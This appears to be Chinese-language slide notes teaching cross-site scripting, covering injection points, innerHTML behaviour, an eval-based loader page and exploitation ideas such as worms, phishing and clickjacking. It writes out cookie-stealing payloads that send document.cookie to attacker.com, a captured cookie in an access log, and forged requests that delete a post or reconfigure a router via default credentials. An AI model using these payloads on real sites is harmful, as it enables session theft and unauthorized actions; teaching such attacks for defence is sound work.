██╗ ██╗███████╗███████╗
╚██╗██╔╝██╔════╝██╔════╝
╚███╔╝ ███████╗███████╗
██╔██╗ ╚════██║╚════██║
██╔╝ ██╗███████║███████║
╚═╝ ╚═╝╚══════╝╚══════╝
XSS漏洞
echo $_GET['param'];
XSS
title tag XSS
访问 http://site.com/?param=<script src='http://attacker.com/1.js'></script>
innerHTML v-html
document.body.innerHTML="<script>alert(1)</script>" // 不执行js
document.body.innerHTML="<img src='x' onerror='alert(1)'>" // 执行js
eval == evil
tunnel.html
<body><script>eval(unescape(atob(location.search.slice(1))))</script></body>
...
'/tunnel.html?'+btoa(escape(jscode))
XSS利用 - Stealing
new Image().src="https://attacker.com/?cookie="+escape(document.cookie)
var script = document.createElement('script');script.src="https://attacker.com/?cookie="+escape(document.cookie);document.body.append(script)
fetch('https://attacker.com/?cookie='+document.cookie)
# tail -f mb_accesslog
45.33.104.18 - - [09/Mar/2020:22:12:29 +0800] "GET /?cookie=BIDUPSID=4B3A1F21C50AA81B...省略...BD_HOME=1 HTTP/1.1" 301 5 "https://www.baidu.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36"
document.cookie [cookie 设置成httponly 防js拿]
document.body.innerText
IP geo agent Info
Keylogger Script
借刀杀人
通过社工方法引诱受害人点击操作,依赖于受害人的环境
new Image().src="http://www.victim-sns.com/del_post?id=33456" 删除一篇日志[需加hash/Token校验]
<img src="http://192.168.1.1/userPpm/ManageControlRpm.html?port=80&ip=255.255.255.255&Save=%B1%A3+%B4%E6"> FAST无线路由器WEB管理的默认用户名与密码: admin
Weibo XSS Worm
钓鱼
广东人吃(婴儿)汤就为了状阳【骇人新闻】
发红包
伪装
clickjacking
SINCE 2018 © markbuild